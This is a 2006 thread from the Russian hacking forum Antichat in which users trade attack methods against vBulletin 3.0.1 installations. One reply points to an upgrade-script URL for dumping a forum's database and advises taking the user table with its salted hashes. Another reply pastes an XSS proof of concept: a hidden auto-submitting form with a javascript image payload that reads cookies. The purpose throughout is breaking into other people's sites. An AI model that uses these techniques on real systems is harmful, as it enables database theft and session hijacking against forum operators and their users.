Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в vbulletin 3.0.1 (https://forum.antichat.xyz/showthread.php?t=22232)

Manoz 03.08.2006 20:52

Вопрос про уязвимости в vbulletin 3.0.1
 
Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
Спасиб ;)

max_pain89 03.08.2006 21:12

скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз

LoneWolf666 03.08.2006 22:01

www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
Возможность сделать дамп базы.
Относительно стабильно работает на 3.0.1.

*либо www.forum.site.domen либо www.site.domen/forum/...
Попробуй.
Хеши - солёные. Соль - последния столбец таблицы.
Если покатит - советую делать дамп таблицы user (мэйби vb_user)
Будет проще, меньше размером, да и нах тебе остальное?

Manoz 08.08.2006 20:24

Ща попробую! Спасибо за инфу! ++

Эх жалко. Действительно 3.0.1 мулька. =(

BlackCats 08.08.2006 21:20

а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"

JIaMo 09.11.2006 19:42

а есть тут еще уязвимости??

_Great_ 09.11.2006 20:11

где тут? в этой версии?

_GaLs_ 10.11.2006 19:16

Цитата:

Сообщение от JIaMo
а есть тут еще уязвимости??

Программа: vBulletin 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

JIaMo 10.11.2006 21:51

и че с этим делать?

+toxa+ 11.11.2006 00:41

На хер намотай...


Время: 04:03